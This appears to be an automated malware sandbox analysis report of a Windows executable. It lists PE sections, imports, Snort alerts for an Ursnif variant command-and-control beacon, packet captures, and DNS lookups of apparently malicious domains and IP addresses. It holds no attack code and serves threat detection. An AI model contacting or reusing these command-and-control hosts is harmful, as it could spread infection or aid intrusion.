IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2df00	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x26000	0x104	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x24b62	0x24c00	False	0.764774659864	data	6.93749374769	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x26000	0x9182	0x9200	False	0.418049015411	data	4.70373356685	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x30000	0xe000	0x4800	False	0.351616753472	data	3.54953091809	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x3e000	0x1e0	0x200	False	0.53125	data	4.71767883295	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
aZAqrnJo	0x3f000	0x3819	0x3a00	False	0.371901939655	data	4.84589461101
BGOllIzc	0x43000	0x4896	0x4a00	False	0.430796030405	data	4.44387669298
yQtoRARz	0x48000	0xcbc0	0xcc00	False	0.348268995098	data	4.58448491924
dZLJZOuu	0x55000	0x60359	0x60400	False	0.332028713474	data	4.87800746939
sdDGHbsk	0xb6000	0x18385	0x18400	False	0.45299412049	data	5.29827826108
cQfsAIeK	0xcf000	0x3eeae	0x3f000	False	0.307458302331	data	5.32329417249
nJjdtQIB	0x10e000	0xff4f	0x10000	False	0.380676269531	data	4.75106212908
pcHOcQzM	0x11e000	0x607b	0x6200	False	0.496970663265	data	5.22222913281
wDcvvqlu	0x125000	0xa629	0xa800	False	0.457333519345	data	5.40009906885
orXBiygL	0x130000	0x28f16	0x29000	False	0.254954268293	data	4.87572841572
AiZKCfrK	0x159000	0x3c8b	0x3e00	False	0.276272681452	data	3.80209006598
myoGvTPf	0x15d000	0x27a	0x400	False	0.330078125	data	3.13663618281
AVTlzkED	0x15e000	0x4162	0x4200	False	0.383877840909	data	4.89078285751
bzLENpIH	0x163000	0x889a	0x8a00	False	0.345957880435	data	4.43979752948
XcYnViEt	0x16c000	0x59825	0x59a00	False	0.332216483612	SysEx File -	5.94377045532
mbKhPZXg	0x1c6000	0x944	0xa00	False	0.384375	data	4.46068376218
lUpFJlcq	0x1c7000	0x93	0x200	False	0.150390625	data	1.08603487889
yiDSdvAK	0x1c8000	0x29c49	0x29e00	False	0.292000932836	data	6.01702880808
tWLpgAgw	0x1f2000	0x1d3fb	0x1d400	False	0.329794337607	data	4.73500817041
bTGdVUjl	0x210000	0x1c142	0x1c200	False	0.322222222222	data	4.78096652478
ziIDaoXi	0x22d000	0xbd62	0xbe00	False	0.364823190789	data	4.66321532752
LzawvTwX	0x239000	0x21626	0x21800	False	0.1875	data	3.92488643682
LnIDzdzd	0x25b000	0x8000	0x8000	False	0.382080078125	data	4.73126113063
wkCXpCGo	0x263000	0x44a5	0x4600	False	0.351897321429	data	4.65104155262
nqpeKqho	0x268000	0x828a	0x8400	False	0.332682291667	data	4.39080198834
MRjgEOqy	0x271000	0x1cca	0x1e00	False	0.403776041667	data	5.16290821803
JcLmCXgA	0x273000	0xb8dc	0xba00	False	0.34627016129	data	4.63415459895
OtycdIdu	0x27f000	0x10649	0x10800	False	0.418235085227	data	5.25113561119
IbVOTdPC	0x290000	0x4b5	0x600	False	0.34375	data	3.25550625419
FgFHDyjf	0x291000	0x10775	0x10800	False	0.400153882576	data	4.92204812869
ybeqBvHg	0x2a2000	0xa663	0xa800	False	0.433430989583	data	5.16751770906
IbzUQYJs	0x2ad000	0x317f	0x3200	False	0.33484375	data	5.16903653942
AQBgSYnS	0x2b1000	0x3001	0x3200	False	0.395390625	data	5.13205626758
XxFUmGWX	0x2b5000	0x7fa3	0x8000	False	0.342498779297	data	4.64166784079
afVQQtfj	0x2bd000	0x1766	0x1800	False	0.4306640625	data	5.22679049555
nwvMTysA	0x2bf000	0x95de	0x9600	False	0.408567708333	data	4.91622055711
ZHPQhgLD	0x2c9000	0x31ea	0x3200	False	0.443125	data	5.40153365825
pxMMJkwk	0x2cd000	0xf4a0	0xf600	False	0.285410315041	data	4.15839164982
JXHCNYcJ	0x2dd000	0x645	0x800	False	0.384765625	data	3.87209019024
lYRopDTG	0x2de000	0x46ef	0x4800	False	0.217881944444	data	3.87911693157
bcYTpMaT	0x2e3000	0xb1b4	0xb200	False	0.446980337079	data	5.30459672358
nuBezWiu	0x2ef000	0xef16	0xf000	False	0.266731770833	data	4.54407396418
yPvpmSBg	0x2fe000	0x7d39	0x7e00	False	0.324776785714	data	4.31832937377
OoEfGgTM	0x306000	0x2239	0x2400	False	0.461805555556	data	4.81294100952
kYRGCWEC	0x309000	0x13560	0x13600	False	0.361365927419	data	4.61084789586
ssiFbfZW	0x31d000	0xfd20	0xfe00	False	0.397991510827	data	4.83645609944
KHKSQqok	0x32d000	0x2e91	0x3000	False	0.551106770833	data	6.15665163676
NcZcjaDP	0x330000	0x8baf	0x8c00	False	0.358286830357	data	4.53824163163
mIUEylgT	0x339000	0x2abec	0x2ac00	False	0.225660179094	data	3.89084100028
lluFjCpP	0x364000	0x1242	0x1400	False	0.3734375	data	4.01527750922
BHqNuAAF	0x366000	0x2fe5	0x3000	False	0.404296875	data	5.07399713959
dWFkhiaJ	0x369000	0xe12b	0xe200	False	0.451552129425	data	5.04492106469
NeKPPFmp	0x378000	0x10dc	0x1200	False	0.41015625	data	4.74787400821
mRaJxCpw	0x37a000	0x2d55	0x2e00	False	0.40090013587	data	5.08071078207
sjZRApAc	0x37d000	0x51e6	0x5200	False	0.340224847561	data	4.57864669136
mJuapRBt	0x383000	0x2896	0x2a00	False	0.399181547619	data	5.11002345911
AUQwTDRB	0x386000	0x6513	0x6600	False	0.320465686275	data	4.31847897425
Mzpcxreq	0x38d000	0x82bc	0x8400	False	0.261156486742	data	3.767572246
DQLewjlc	0x396000	0x22a9	0x2400	False	0.397135416667	data	5.07745042262
yQzDovRx	0x399000	0x187	0x200	False	0.44140625	data	2.58744007464
KsasGyWE	0x39a000	0x341c	0x3600	False	0.452618634259	data	4.59764407477
qALhWEsZ	0x39e000	0x978	0xa00	False	0.408984375	data	4.298132059
EhLKChYp	0x39f000	0xc9c7	0xca00	False	0.356725711634	data	4.56772549135
juiuAwmE	0x3ac000	0x805	0xa00	False	0.3203125	data	3.84392745238
FPCcnPuO	0x3ad000	0x30066	0x30200	False	0.185328733766	data	5.48813033427
DQPOFovS	0x3de000	0x2e49	0x3000	False	0.396647135417	data	5.03014687317
eeLebknr	0x3e1000	0x165f	0x1800	False	0.357421875	data	3.82572779856

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0x3e060	0x17d	XML 1.0 document text	English	United States

Imports

DLL

Import

KERNEL32.dll

ExitProcess, GetModuleHandleW, WideCharToMultiByte, LoadLibraryW, Sleep, GetModuleFileNameW, GetTempPathW, VirtualProtect, GetCurrentProcessId, EncodePointer, DecodePointer, GetCommandLineA, RaiseException, RtlUnwind, IsDebuggerPresent, IsProcessorFeaturePresent, GetLastError, GetModuleHandleExW, GetProcAddress, MultiByteToWideChar, HeapSize, HeapFree, HeapAlloc, SetLastError, GetCurrentThreadId, GetProcessHeap, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, GetModuleFileNameA, WriteFile, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EnterCriticalSection, LeaveCriticalSection, LoadLibraryExW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, HeapReAlloc, LCMapStringW, OutputDebugStringW, GetStringTypeW, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetStdHandle, SetFilePointerEx, WriteConsoleW, CloseHandle, CreateFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
09/14/21-16:03:19.921633	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49737	80	192.168.2.6	173.239.8.164
09/14/21-16:03:19.921633	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49737	80	192.168.2.6	173.239.8.164
09/14/21-16:03:20.611062	TCP	2030821	ET MALWARE Win32/Zonebac Traffic Redirect	49737	80	192.168.2.6	173.239.8.164

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 14, 2021 16:03:19.816663980 CEST	49737	80	192.168.2.6	173.239.8.164
Sep 14, 2021 16:03:19.817102909 CEST	49738	80	192.168.2.6	173.239.8.164
Sep 14, 2021 16:03:19.919540882 CEST	80	49737	173.239.8.164	192.168.2.6
Sep 14, 2021 16:03:19.919682980 CEST	49737	80	192.168.2.6	173.239.8.164
Sep 14, 2021 16:03:19.919892073 CEST	80	49738	173.239.8.164	192.168.2.6
Sep 14, 2021 16:03:19.919953108 CEST	49738	80	192.168.2.6	173.239.8.164
Sep 14, 2021 16:03:19.921633005 CEST	49737	80	192.168.2.6	173.239.8.164
Sep 14, 2021 16:03:20.024296999 CEST	80	49737	173.239.8.164	192.168.2.6
Sep 14, 2021 16:03:20.024328947 CEST	80	49737	173.239.8.164	192.168.2.6
Sep 14, 2021 16:03:20.024430990 CEST	49737	80	192.168.2.6	173.239.8.164
Sep 14, 2021 16:03:20.027059078 CEST	49737	80	192.168.2.6	173.239.8.164
Sep 14, 2021 16:03:20.137682915 CEST	80	49737	173.239.8.164	192.168.2.6
Sep 14, 2021 16:03:20.178255081 CEST	49737	80	192.168.2.6	173.239.8.164
Sep 14, 2021 16:03:20.611062050 CEST	49737	80	192.168.2.6	173.239.8.164
Sep 14, 2021 16:03:20.750940084 CEST	80	49737	173.239.8.164	192.168.2.6
Sep 14, 2021 16:03:21.647305965 CEST	80	49737	173.239.8.164	192.168.2.6
Sep 14, 2021 16:03:21.647342920 CEST	80	49737	173.239.8.164	192.168.2.6
Sep 14, 2021 16:03:21.650079012 CEST	49737	80	192.168.2.6	173.239.8.164
Sep 14, 2021 16:03:21.873105049 CEST	49740	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:21.873159885 CEST	443	49740	173.192.101.24	192.168.2.6
Sep 14, 2021 16:03:21.873353004 CEST	49740	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:21.875137091 CEST	49739	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:21.875197887 CEST	443	49739	173.192.101.24	192.168.2.6
Sep 14, 2021 16:03:21.876682043 CEST	49739	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:21.896848917 CEST	49739	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:21.896888018 CEST	49740	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:21.896929026 CEST	443	49740	173.192.101.24	192.168.2.6
Sep 14, 2021 16:03:21.896929026 CEST	443	49739	173.192.101.24	192.168.2.6
Sep 14, 2021 16:03:22.318064928 CEST	443	49740	173.192.101.24	192.168.2.6
Sep 14, 2021 16:03:22.321357965 CEST	49740	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:22.326577902 CEST	443	49739	173.192.101.24	192.168.2.6
Sep 14, 2021 16:03:22.326772928 CEST	49739	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:22.470643044 CEST	49740	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:22.470680952 CEST	443	49740	173.192.101.24	192.168.2.6
Sep 14, 2021 16:03:22.472085953 CEST	49739	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:22.472103119 CEST	443	49739	173.192.101.24	192.168.2.6
Sep 14, 2021 16:03:22.472162008 CEST	49739	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:22.472172022 CEST	443	49739	173.192.101.24	192.168.2.6
Sep 14, 2021 16:03:22.476360083 CEST	443	49740	173.192.101.24	192.168.2.6
Sep 14, 2021 16:03:22.477334023 CEST	443	49739	173.192.101.24	192.168.2.6
Sep 14, 2021 16:03:22.478369951 CEST	49740	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:22.481487036 CEST	49739	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:22.623094082 CEST	443	49739	173.192.101.24	192.168.2.6
Sep 14, 2021 16:03:22.623182058 CEST	49739	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:22.623204947 CEST	443	49739	173.192.101.24	192.168.2.6
Sep 14, 2021 16:03:22.623267889 CEST	49739	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:22.626868963 CEST	49739	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:22.626921892 CEST	49739	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:22.634169102 CEST	80	49737	173.239.8.164	192.168.2.6
Sep 14, 2021 16:03:22.634272099 CEST	49737	80	192.168.2.6	173.239.8.164
Sep 14, 2021 16:03:22.685231924 CEST	49742	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:22.685235977 CEST	49741	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:22.685288906 CEST	443	49741	173.192.101.24	192.168.2.6
Sep 14, 2021 16:03:22.685290098 CEST	443	49742	173.192.101.24	192.168.2.6
Sep 14, 2021 16:03:22.687156916 CEST	49742	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:22.687591076 CEST	49742	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:22.687612057 CEST	443	49742	173.192.101.24	192.168.2.6
Sep 14, 2021 16:03:22.688129902 CEST	49741	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:22.688167095 CEST	49741	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:22.688178062 CEST	443	49741	173.192.101.24	192.168.2.6
Sep 14, 2021 16:03:23.130965948 CEST	443	49741	173.192.101.24	192.168.2.6
Sep 14, 2021 16:03:23.131134033 CEST	49741	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:23.135868073 CEST	443	49742	173.192.101.24	192.168.2.6
Sep 14, 2021 16:03:23.136034966 CEST	49742	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:23.138343096 CEST	49741	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:23.138360977 CEST	443	49741	173.192.101.24	192.168.2.6
Sep 14, 2021 16:03:23.138676882 CEST	443	49741	173.192.101.24	192.168.2.6
Sep 14, 2021 16:03:23.138747931 CEST	49741	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:23.139683962 CEST	49741	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:23.142352104 CEST	49742	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:23.142379045 CEST	443	49742	173.192.101.24	192.168.2.6
Sep 14, 2021 16:03:23.142632008 CEST	443	49742	173.192.101.24	192.168.2.6
Sep 14, 2021 16:03:23.142690897 CEST	49742	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:23.183137894 CEST	443	49741	173.192.101.24	192.168.2.6
Sep 14, 2021 16:03:23.464582920 CEST	443	49741	173.192.101.24	192.168.2.6
Sep 14, 2021 16:03:23.466078997 CEST	49741	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:23.466099977 CEST	443	49741	173.192.101.24	192.168.2.6
Sep 14, 2021 16:03:23.466159105 CEST	49741	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:23.469449043 CEST	49741	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:23.469459057 CEST	49741	443	192.168.2.6	173.192.101.24
Sep 14, 2021 16:03:23.517185926 CEST	49743	443	192.168.2.6	168.119.139.96
Sep 14, 2021 16:03:23.517239094 CEST	443	49743	168.119.139.96	192.168.2.6
Sep 14, 2021 16:03:23.517271042 CEST	49744	443	192.168.2.6	168.119.139.96
Sep 14, 2021 16:03:23.517304897 CEST	443	49744	168.119.139.96	192.168.2.6
Sep 14, 2021 16:03:23.517436028 CEST	49744	443	192.168.2.6	168.119.139.96
Sep 14, 2021 16:03:23.518336058 CEST	49744	443	192.168.2.6	168.119.139.96
Sep 14, 2021 16:03:23.518351078 CEST	443	49744	168.119.139.96	192.168.2.6
Sep 14, 2021 16:03:23.518470049 CEST	49743	443	192.168.2.6	168.119.139.96
Sep 14, 2021 16:03:23.518970966 CEST	49743	443	192.168.2.6	168.119.139.96
Sep 14, 2021 16:03:23.518996000 CEST	443	49743	168.119.139.96	192.168.2.6
Sep 14, 2021 16:03:23.606755972 CEST	443	49743	168.119.139.96	192.168.2.6
Sep 14, 2021 16:03:23.606992960 CEST	49743	443	192.168.2.6	168.119.139.96
Sep 14, 2021 16:03:23.607831955 CEST	443	49744	168.119.139.96	192.168.2.6
Sep 14, 2021 16:03:23.607923031 CEST	49744	443	192.168.2.6	168.119.139.96
Sep 14, 2021 16:03:23.612099886 CEST	49743	443	192.168.2.6	168.119.139.96
Sep 14, 2021 16:03:23.612128973 CEST	443	49743	168.119.139.96	192.168.2.6
Sep 14, 2021 16:03:23.612489939 CEST	49743	443	192.168.2.6	168.119.139.96
Sep 14, 2021 16:03:23.612504959 CEST	443	49743	168.119.139.96	192.168.2.6
Sep 14, 2021 16:03:23.612565041 CEST	49743	443	192.168.2.6	168.119.139.96
Sep 14, 2021 16:03:23.613780022 CEST	49744	443	192.168.2.6	168.119.139.96

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 14, 2021 16:02:41.352334023 CEST	55074	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:02:41.382185936 CEST	53	55074	8.8.8.8	192.168.2.6
Sep 14, 2021 16:03:12.456141949 CEST	54513	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:03:12.483231068 CEST	53	54513	8.8.8.8	192.168.2.6
Sep 14, 2021 16:03:17.626017094 CEST	62044	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:03:17.659617901 CEST	53	62044	8.8.8.8	192.168.2.6
Sep 14, 2021 16:03:19.723831892 CEST	63791	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:03:19.756581068 CEST	53	63791	8.8.8.8	192.168.2.6
Sep 14, 2021 16:03:21.819623947 CEST	64267	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:03:21.848687887 CEST	53	64267	8.8.8.8	192.168.2.6
Sep 14, 2021 16:03:22.631850958 CEST	49448	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:03:22.679900885 CEST	53	49448	8.8.8.8	192.168.2.6
Sep 14, 2021 16:03:23.476247072 CEST	60342	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:03:23.514079094 CEST	53	60342	8.8.8.8	192.168.2.6
Sep 14, 2021 16:03:24.063437939 CEST	61346	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:03:24.098937035 CEST	53	61346	8.8.8.8	192.168.2.6
Sep 14, 2021 16:03:24.214965105 CEST	51774	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:03:24.244478941 CEST	53	51774	8.8.8.8	192.168.2.6
Sep 14, 2021 16:03:24.691652060 CEST	56023	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:03:24.718938112 CEST	53	56023	8.8.8.8	192.168.2.6
Sep 14, 2021 16:03:31.354084969 CEST	58384	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:03:31.381381989 CEST	53	58384	8.8.8.8	192.168.2.6
Sep 14, 2021 16:03:31.936877012 CEST	60261	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:03:31.974136114 CEST	53	60261	8.8.8.8	192.168.2.6
Sep 14, 2021 16:03:32.774014950 CEST	56061	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:03:32.802583933 CEST	53	56061	8.8.8.8	192.168.2.6
Sep 14, 2021 16:03:33.456876040 CEST	58336	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:03:33.512201071 CEST	53	58336	8.8.8.8	192.168.2.6
Sep 14, 2021 16:03:33.832693100 CEST	53781	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:03:33.869004011 CEST	53	53781	8.8.8.8	192.168.2.6
Sep 14, 2021 16:03:34.882792950 CEST	54064	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:03:34.911484003 CEST	53	54064	8.8.8.8	192.168.2.6
Sep 14, 2021 16:03:35.330614090 CEST	52811	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:03:35.361411095 CEST	53	52811	8.8.8.8	192.168.2.6
Sep 14, 2021 16:03:35.818566084 CEST	55299	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:03:35.845401049 CEST	53	55299	8.8.8.8	192.168.2.6
Sep 14, 2021 16:03:37.120443106 CEST	63745	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:03:37.147418022 CEST	53	63745	8.8.8.8	192.168.2.6
Sep 14, 2021 16:03:39.126331091 CEST	50055	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:03:39.167191029 CEST	53	50055	8.8.8.8	192.168.2.6
Sep 14, 2021 16:03:40.212603092 CEST	61374	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:03:40.239373922 CEST	53	61374	8.8.8.8	192.168.2.6
Sep 14, 2021 16:03:47.589806080 CEST	50339	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:03:47.659252882 CEST	53	50339	8.8.8.8	192.168.2.6
Sep 14, 2021 16:03:48.264544010 CEST	63307	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:03:48.296758890 CEST	49694	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:03:48.322751045 CEST	53	63307	8.8.8.8	192.168.2.6
Sep 14, 2021 16:03:48.324810028 CEST	53	49694	8.8.8.8	192.168.2.6
Sep 14, 2021 16:03:48.591943979 CEST	50339	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:03:48.631686926 CEST	53	50339	8.8.8.8	192.168.2.6
Sep 14, 2021 16:03:49.635165930 CEST	50339	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:03:49.663881063 CEST	53	50339	8.8.8.8	192.168.2.6
Sep 14, 2021 16:03:50.938179016 CEST	54982	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:03:50.980142117 CEST	53	54982	8.8.8.8	192.168.2.6
Sep 14, 2021 16:03:51.681217909 CEST	50339	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:03:51.719065905 CEST	53	50339	8.8.8.8	192.168.2.6
Sep 14, 2021 16:03:55.699737072 CEST	50339	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:03:55.729726076 CEST	53	50339	8.8.8.8	192.168.2.6
Sep 14, 2021 16:04:09.371015072 CEST	50010	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:04:09.435826063 CEST	53	50010	8.8.8.8	192.168.2.6
Sep 14, 2021 16:04:28.190947056 CEST	63718	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:04:28.229515076 CEST	53	63718	8.8.8.8	192.168.2.6
Sep 14, 2021 16:04:30.006293058 CEST	62116	53	192.168.2.6	8.8.8.8
Sep 14, 2021 16:04:30.052378893 CEST	53	62116	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 14, 2021 16:03:19.723831892 CEST	192.168.2.6	8.8.8.8	0x9451	Standard query (0)	menehleibe.com	A (IP address)	IN (0x0001)
Sep 14, 2021 16:03:21.819623947 CEST	192.168.2.6	8.8.8.8	0x1065	Standard query (0)	mybetterdl.com	A (IP address)	IN (0x0001)
Sep 14, 2021 16:03:22.631850958 CEST	192.168.2.6	8.8.8.8	0x9179	Standard query (0)	p226681.mybetterdl.com	A (IP address)	IN (0x0001)
Sep 14, 2021 16:03:23.476247072 CEST	192.168.2.6	8.8.8.8	0xd2e1	Standard query (0)	gertrk.com	A (IP address)	IN (0x0001)
Sep 14, 2021 16:03:24.063437939 CEST	192.168.2.6	8.8.8.8	0xb4d3	Standard query (0)	google.com	A (IP address)	IN (0x0001)
Sep 14, 2021 16:03:24.214965105 CEST	192.168.2.6	8.8.8.8	0x6538	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Sep 14, 2021 16:03:19.756581068 CEST	8.8.8.8	192.168.2.6	0x9451	No error (0)	menehleibe.com	173.239.8.164	A (IP address)	IN (0x0001)
Sep 14, 2021 16:03:19.756581068 CEST	8.8.8.8	192.168.2.6	0x9451	No error (0)	menehleibe.com	74.206.228.78	A (IP address)	IN (0x0001)
Sep 14, 2021 16:03:19.756581068 CEST	8.8.8.8	192.168.2.6	0x9451	No error (0)	menehleibe.com	173.239.5.6	A (IP address)	IN (0x0001)
Sep 14, 2021 16:03:21.848687887 CEST	8.8.8.8	192.168.2.6	0x1065	No error (0)	mybetterdl.com	173.192.101.24	A (IP address)	IN (0x0001)
Sep 14, 2021 16:03:22.679900885 CEST	8.8.8.8	192.168.2.6	0x9179	No error (0)	p226681.mybetterdl.com	173.192.101.24	A (IP address)	IN (0x0001)
Sep 14, 2021 16:03:23.514079094 CEST	8.8.8.8	192.168.2.6	0xd2e1	No error (0)	gertrk.com	168.119.139.96	A (IP address)	IN (0x0001)
Sep 14, 2021 16:03:24.098937035 CEST	8.8.8.8	192.168.2.6	0xb4d3	No error (0)	google.com	142.250.203.110	A (IP address)	IN (0x0001)
Sep 14, 2021 16:03:24.244478941 CEST	8.8.8.8	192.168.2.6	0x6538	No error (0)	www.google.com	142.250.102.106	A (IP address)	IN (0x0001)
Sep 14, 2021 16:03:24.244478941 CEST	8.8.8.8	192.168.2.6	0x6538	No error (0)	www.google.com	142.250.102.105	A (IP address)	IN (0x0001)
Sep 14, 2021 16:03:24.244478941 CEST	8.8.8.8	192.168.2.6	0x6538	No error (0)	www.google.com	142.250.102.99	A (IP address)	IN (0x0001)
Sep 14, 2021 16:03:24.244478941 CEST	8.8.8.8	192.168.2.6	0x6538	No error (0)	www.google.com	142.250.102.147	A (IP address)	IN (0x0001)
Sep 14, 2021 16:03:24.244478941 CEST	8.8.8.8	192.168.2.6	0x6538	No error (0)	www.google.com	142.250.102.104	A (IP address)	IN (0x0001)
Sep 14, 2021 16:03:24.244478941 CEST	8.8.8.8	192.168.2.6	0x6538	No error (0)	www.google.com	142.250.102.103	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

menehleibe.com

mybetterdl.com

p226681.mybetterdl.com

gertrk.com

www.google.com

https:

google.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49739	173.192.101.24	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49741	173.192.101.24	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.6	49748	142.250.203.110	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Sep 14, 2021 16:03:24.150072098 CEST	1064	OUT	GET / HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: google.com Connection: Keep-Alive
Sep 14, 2021 16:03:24.203008890 CEST	1071	IN	HTTP/1.1 301 Moved Permanently Location: http://www.google.com/ Content-Type: text/html; charset=UTF-8 Date: Tue, 14 Sep 2021 14:03:24 GMT Expires: Thu, 14 Oct 2021 14:03:24 GMT Cache-Control: public, max-age=2592000 Server: gws Content-Length: 219 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: 